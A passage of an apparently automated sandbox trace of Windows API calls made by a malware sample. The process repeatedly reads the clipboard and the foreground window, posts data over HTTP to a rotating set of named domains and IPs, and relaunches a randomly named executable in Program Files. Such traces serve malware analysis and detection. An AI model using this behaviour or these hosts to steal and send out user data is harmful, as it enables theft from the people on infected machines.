pNodeName="www.golfsol.art", pServiceName="80", pHints=0x4b13478*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b134a8 | out: ppResult=0x4b134a8*=0x85d32f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49c00*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.56"), ai_next=0x85d3330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49e80*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.55"), ai_next=0x85d50b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4a0e0*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.83"), ai_next=0x85d55f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49ce0*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.18"), ai_next=0x0))))) returned 0 [0173.949] connect (s=0x1f74, name=0x4b49c00*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.56"), namelen=16) returned 0 [0174.049] send (s=0x1f74, buf=0xb0dd322*, len=163, flags=0) returned 163 [0174.049] setsockopt (s=0x1f74, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0174.049] recv (in: s=0x1f74, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 672 [0174.168] closesocket (s=0x1f74) returned 0 [0174.169] Sleep (dwMilliseconds=0x1388) [0174.170] OpenClipboard (hWndNewOwner=0x0) returned 1 [0174.170] GetClipboardData (uFormat=0xd) returned 0x4b0a870 [0174.170] GlobalLock (hMem=0x4b0a870) returned 0x4b0a870 [0174.170] GlobalUnlock (hMem=0x4b0a870) returned 1 [0174.170] CloseClipboard () returned 1 [0174.170] socket (af=2, type=1, protocol=6) returned 0x1f74 [0174.170] getaddrinfo (in: pNodeName="www.shahjahantravel.com", pServiceName="80", pHints=0x4b13818*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13848 | out: ppResult=0x4b13848*=0x4d56280*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49d00*(sa_family=2, sin_port=0x50, sin_addr="104.219.248.101"), ai_next=0x0)) returned 0 [0174.182] connect (s=0x1f74, name=0x4b49d00*(sa_family=2, sin_port=0x50, sin_addr="104.219.248.101"), namelen=16) returned 0 [0174.356] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="3229") returned 0x0 [0174.356] send (s=0x1f74, buf=0xb0bff22*, len=3650, flags=0) returned 3650 [0174.356] closesocket (s=0x1f74) returned 0 [0174.357] socket (af=2, type=1, protocol=6) returned 0x1f74 [0174.357] connect (s=0x1f74, name=0x4b49d00*(sa_family=2, sin_port=0x50, sin_addr="104.219.248.101"), namelen=16) returned 0 [0174.534] RtlIntegerToChar (in: Value=0xf9, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="249") returned 0x0 [0174.534] send (s=0x1f74, buf=0xb0bff22*, len=669, flags=0) returned 669 [0174.535] closesocket (s=0x1f74) returned 0 [0174.535] socket (af=2, type=1, protocol=6) returned 0x1f74 [0174.535] connect (s=0x1f74, name=0x4b49d00*(sa_family=2, sin_port=0x50, sin_addr="104.219.248.101"), namelen=16) returned 0 [0174.706] send (s=0x1f74, buf=0xb0dd322*, len=171, flags=0) returned 171 [0174.707] setsockopt (s=0x1f74, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0174.707] recv (in: s=0x1f74, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 1065 [0174.902] closesocket (s=0x1f74) returned 0 [0174.902] Sleep (dwMilliseconds=0x1388) [0174.904] OpenClipboard (hWndNewOwner=0x0) returned 1 [0174.904] GetClipboardData (uFormat=0xd) returned 0x4b0b450 [0174.904] GlobalLock (hMem=0x4b0b450) returned 0x4b0b450 [0174.904] GlobalUnlock (hMem=0x4b0b450) returned 1 [0174.904] CloseClipboard () returned 1 [0174.904] socket (af=2, type=1, protocol=6) returned 0x1f74 [0174.904] getaddrinfo (in: pNodeName="www.limiteditionft.com", pServiceName="80", pHints=0x4b13bb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13be8 | out: ppResult=0x4b13be8*=0x4d57a40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49d60*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0174.916] connect (s=0x1f74, name=0x4b49d60*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0174.936] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="3229") returned 0x0 [0174.936] send (s=0x1f74, buf=0xb0bff22*, len=3647, flags=0) returned 3647 [0174.937] closesocket (s=0x1f74) returned 0 [0174.937] socket (af=2, type=1, protocol=6) returned 0x1f74 [0174.938] connect (s=0x1f74, name=0x4b49d60*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0174.965] RtlIntegerToChar (in: Value=0xf9, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="249") returned 0x0 [0174.965] send (s=0x1f74, buf=0xb0bff22*, len=666, flags=0) returned 666 [0174.966] closesocket (s=0x1f74) returned 0 [0174.966] socket (af=2, type=1, protocol=6) returned 0x1f74 [0174.967] connect (s=0x1f74, name=0x4b49d60*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0174.989] send (s=0x1f74, buf=0xb0dd322*, len=170, flags=0) returned 170 [0174.990] setsockopt (s=0x1f74, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0174.990] recv (in: s=0x1f74, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0175.203] closesocket (s=0x1f74) returned 0 [0175.204] Sleep (dwMilliseconds=0x1388) [0175.205] OpenClipboard (hWndNewOwner=0x0) returned 1 [0175.205] GetClipboardData (uFormat=0xd) returned 0x4b0a870 [0175.205] GlobalLock (hMem=0x4b0a870) returned 0x4b0a870 [0175.205] GlobalUnlock (hMem=0x4b0a870) returned 1 [0175.205] CloseClipboard () returned 1 [0175.206] socket (af=2, type=1, protocol=6) returned 0x1f74 [0175.206] getaddrinfo (in: pNodeName="www.babeshotnud.com", pServiceName="80", pHints=0x4b13f58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13f88 | out: ppResult=0x4b13f88*=0x4d57840*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49c60*(sa_family=2, sin_port=0x50, sin_addr="185.107.56.60"), ai_next=0x0)) returned 0 [0175.267] connect (s=0x1f74, name=0x4b49c60*(sa_family=2, sin_port=0x50, sin_addr="185.107.56.60"), namelen=16) returned 0 [0175.291] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="3229") returned 0x0 [0175.291] send (s=0x1f74, buf=0xb0bff22*, len=3638, flags=0) returned 3638 [0175.292] closesocket (s=0x1f74) returned 0 [0175.292] socket (af=2, type=1, protocol=6) returned 0x1f74 [0175.292] connect (s=0x1f74, name=0x4b49c60*(sa_family=2, sin_port=0x50, sin_addr="185.107.56.60"), namelen=16) returned 0 [0175.324] RtlIntegerToChar (in: Value=0xf9, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="249") returned 0x0 [0175.324] send (s=0x1f74, buf=0xb0bff22*, len=657, flags=0) returned 657 [0175.325] closesocket (s=0x1f74) returned 0 [0175.325] socket (af=2, type=1, protocol=6) returned 0x1f74 [0175.326] connect (s=0x1f74, name=0x4b49c60*(sa_family=2, sin_port=0x50, sin_addr="185.107.56.60"), namelen=16) returned 0 [0175.350] send (s=0x1f74, buf=0xb0dd322*, len=167, flags=0) returned 167 [0175.350] setsockopt (s=0x1f74, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0175.350] recv (in: s=0x1f74, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 368 [0175.805] closesocket (s=0x1f74) returned 0 [0175.807] Sleep (dwMilliseconds=0x1388) [0175.808] OpenClipboard (hWndNewOwner=0x0) returned 1 [0175.809] GetClipboardData (uFormat=0xd) returned 0x4b0a870 [0175.809] GlobalLock (hMem=0x4b0a870) returned 0x4b0a870 [0175.809] GlobalUnlock (hMem=0x4b0a870) returned 1 [0175.809] CloseClipboard () returned 1 [0175.809] socket (af=2, type=1, protocol=6) returned 0x1f74 [0175.810] getaddrinfo (in: pNodeName="www.futurodr.com", pServiceName="80", pHints=0x4b142f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14328 | out: ppResult=0x4b14328*=0x4d56100*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4a040*(sa_family=2, sin_port=0x50, sin_addr="154.208.173.139"), ai_next=0x0)) returned 0 [0175.851] connect (s=0x1f74, name=0x4b4a040*(sa_family=2, sin_port=0x50, sin_addr="154.208.173.139"), namelen=16) returned 0 [0176.072] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="3229") returned 0x0 [0176.072] send (s=0x1f74, buf=0xb0bff22*, len=3629, flags=0) returned 3629 [0176.073] closesocket (s=0x1f74) returned 0 [0176.073] socket (af=2, type=1, protocol=6) returned 0x1f74 [0176.073] connect (s=0x1f74, name=0x4b4a040*(sa_family=2, sin_port=0x50, sin_addr="154.208.173.139"), namelen=16) returned 0 [0176.299] RtlIntegerToChar (in: Value=0xf9, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="249") returned 0x0 [0176.299] send (s=0x1f74, buf=0xb0bff22*, len=648, flags=0) returned 648 [0176.299] closesocket (s=0x1f74) returned 0 [0176.300] socket (af=2, type=1, protocol=6) returned 0x1f74 [0176.300] connect (s=0x1f74, name=0x4b4a040*(sa_family=2, sin_port=0x50, sin_addr="154.208.173.139"), namelen=16) returned 0 [0176.522] send (s=0x1f74, buf=0xb0dd322*, len=164, flags=0) returned 164 [0176.522] setsockopt (s=0x1f74, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0176.522] recv (in: s=0x1f74, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c) returned 0 [0176.748] closesocket (s=0x1f74) returned 0 [0176.749] Sleep (dwMilliseconds=0x1388) [0176.751] OpenClipboard (hWndNewOwner=0x0) returned 1 [0176.751] GetClipboardData (uFormat=0xd) returned 0x4b0b040 [0176.751] GlobalLock (hMem=0x4b0b040) returned 0x4b0b040 [0176.751] GlobalUnlock (hMem=0x4b0b040) returned 1 [0176.751] CloseClipboard () returned 1 [0176.751] socket (af=2, type=1, protocol=6) returned 0x1f74 [0176.751] getaddrinfo (in: pNodeName="www.estanciasanpablo.online", pServiceName="80", pHints=0x4b14698*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b146c8 | out: ppResult=0x4b146c8*=0x0) returned 11002 [0180.108] getaddrinfo (in: pNodeName="www.estanciasanpablo.online", pServiceName="80", pHints=0x4b14698*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b146c8 | out: ppResult=0x4b146c8*=0x0) returned 11002 [0184.955] getaddrinfo (in: pNodeName="www.estanciasanpablo.online", pServiceName="80", pHints=0x4b14698*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b146c8 | out: ppResult=0x4b146c8*=0x0) returned 11002 [0188.585] Sleep (dwMilliseconds=0x1388) [0188.587] OpenClipboard (hWndNewOwner=0x0) returned 1 [0188.587] GetClipboardData (uFormat=0xd) returned 0x4b0af50 [0188.587] GlobalLock (hMem=0x4b0af50) returned 0x4b0af50 [0188.587] GetForegroundWindow () returned 0x0 [0188.587] GetWindowTextW (in: hWnd=0x0, lpString=0xb0b72a2, nMaxCount=260 | out: lpString="") returned 0 [0188.587] GlobalUnlock (hMem=0x4b0af50) returned 1 [0188.587] CloseClipboard () returned 1 [0188.587] socket (af=2, type=1, protocol=6) returned 0x20cc [0188.588] getaddrinfo (in: pNodeName="www.toptaxxi.store", pServiceName="80", pHints=0x4b14a38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14a68 | out: ppResult=0x4b14a68*=0x4c8ac50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4a720*(sa_family=2, sin_port=0x50, sin_addr="45.130.41.10"), ai_next=0x0)) returned 0 [0188.594] connect (s=0x20cc, name=0x4b4a720*(sa_family=2, sin_port=0x50, sin_addr="45.130.41.10"), namelen=16) returned 0 [0188.706] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="3229") returned 0x0 [0188.706] send (s=0x20cc, buf=0xb0bff22*, len=3635, flags=0) returned 3635 [0188.706] closesocket (s=0x20cc) returned 0 [0188.707] socket (af=2, type=1, protocol=6) returned 0x20cc [0188.707] connect (s=0x20cc, name=0x4b4a720*(sa_family=2, sin_port=0x50, sin_addr="45.130.41.10"), namelen=16) returned 0 [0188.783] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0188.783] send (s=0x20cc, buf=0xb0bff22*, len=850, flags=0) returned 850 [0188.783] closesocket (s=0x20cc) returned 0 [0188.783] socket (af=2, type=1, protocol=6) returned 0x20cc [0188.784] connect (s=0x20cc, name=0x4b4a720*(sa_family=2, sin_port=0x50, sin_addr="45.130.41.10"), namelen=16) returned 0 [0188.856] send (s=0x20cc, buf=0xb0dd322*, len=166, flags=0) returned 166 [0188.856] setsockopt (s=0x20cc, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0188.856] recv (in: s=0x20cc, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 488 [0189.043] closesocket (s=0x20cc) returned 0 [0189.044] Sleep (dwMilliseconds=0x1388) [0189.045] Sleep (dwMilliseconds=0x1388) [0189.047] Sleep (dwMilliseconds=0x1388) [0189.048] Sleep (dwMilliseconds=0x1388) [0189.050] Sleep (dwMilliseconds=0x1388) [0189.051] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.051] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20cc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.052] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.052] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64980) returned 1 [0189.052] NtQueryInformationFile (in: FileHandle=0x20cc, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.052] NtClose (Handle=0x20cc) returned 0x0 [0189.052] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.052] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20cc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.053] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.053] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64180) returned 1 [0189.053] NtClose (Handle=0x20cc) returned 0x0 [0189.055] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1a50, hThread=0x20cc, dwProcessId=0x904, dwThreadId=0xe7c), hNewToken=0x0) returned 1 [0189.110] Sleep (dwMilliseconds=0x1388) [0189.111] Sleep (dwMilliseconds=0x1388) [0189.113] Sleep (dwMilliseconds=0x1388) [0189.117] Sleep (dwMilliseconds=0x1388) [0189.119] Sleep (dwMilliseconds=0x1388) [0189.121] Sleep (dwMilliseconds=0x1388) [0189.128] Sleep (dwMilliseconds=0x1388) [0189.129] Sleep (dwMilliseconds=0x1388) [0189.130] Sleep (dwMilliseconds=0x1388) [0189.132] Sleep (dwMilliseconds=0x1388) [0189.133] Sleep (dwMilliseconds=0x1388) [0189.135] Sleep (dwMilliseconds=0x1388) [0189.136] Sleep (dwMilliseconds=0x1388) [0189.140] Sleep (dwMilliseconds=0x1388) [0189.142] Sleep (dwMilliseconds=0x1388) [0189.143] Sleep (dwMilliseconds=0x1388) [0189.145] Sleep (dwMilliseconds=0x1388) [0189.146] Sleep (dwMilliseconds=0x1388) [0189.148] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.148] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x211c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.148] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.148] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0189.148] NtQueryInformationFile (in: FileHandle=0x211c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.148] NtClose (Handle=0x211c) returned 0x0 [0189.148] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.148] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x211c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.148] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.149] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0189.149] NtClose (Handle=0x211c) returned 0x0 [0189.150] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20d0, hThread=0x211c, dwProcessId=0x12f8, dwThreadId=0xab8), hNewToken=0x0) returned 1 [0189.165] Sleep (dwMilliseconds=0x1388) [0189.166] Sleep (dwMilliseconds=0x1388) [0189.168] Sleep (dwMilliseconds=0x1388) [0189.169] Sleep (dwMilliseconds=0x1388) [0189.175] Sleep (dwMilliseconds=0x1388) [0189.177] Sleep (dwMilliseconds=0x1388) [0189.178] Sleep (dwMilliseconds=0x1388) [0189.180] Sleep (dwMilliseconds=0x1388) [0189.181] Sleep (dwMilliseconds=0x1388) [0189.183] Sleep (dwMilliseconds=0x1388) [0189.184] Sleep (dwMilliseconds=0x1388) [0189.188] Sleep (dwMilliseconds=0x1388) [0189.190] Sleep (dwMilliseconds=0x1388) [0189.191] Sleep (dwMilliseconds=0x1388) [0189.193] Sleep (dwMilliseconds=0x1388) [0189.195] Sleep (dwMilliseconds=0x1388) [0189.196] Sleep (dwMilliseconds=0x1388) [0189.198] Sleep (dwMilliseconds=0x1388) [0189.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.199] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x215c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.199] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.199] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64300) returned 1 [0189.199] NtQueryInformationFile (in: FileHandle=0x215c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.199] NtClose (Handle=0x215c) returned 0x0 [0189.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.200] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x215c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.200] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.200] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64880) returned 1 [0189.200] NtClose (Handle=0x215c) returned 0x0 [0189.204] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x213c, hThread=0x215c, dwProcessId=0xf78, dwThreadId=0x1384), hNewToken=0x0) returned 1 [0189.214] Sleep (dwMilliseconds=0x1388) [0189.216] Sleep (dwMilliseconds=0x1388) [0189.217] Sleep (dwMilliseconds=0x1388) [0189.221] Sleep (dwMilliseconds=0x1388) [0189.222] Sleep (dwMilliseconds=0x1388) [0189.224] Sleep (dwMilliseconds=0x1388) [0189.226] Sleep (dwMilliseconds=0x1388) [0189.229] Sleep (dwMilliseconds=0x1388) [0189.230] Sleep (dwMilliseconds=0x1388) [0189.232] Sleep (dwMilliseconds=0x1388) [0189.237] Sleep (dwMilliseconds=0x1388) [0189.239] Sleep (dwMilliseconds=0x1388) [0189.240] Sleep (dwMilliseconds=0x1388) [0189.242] Sleep 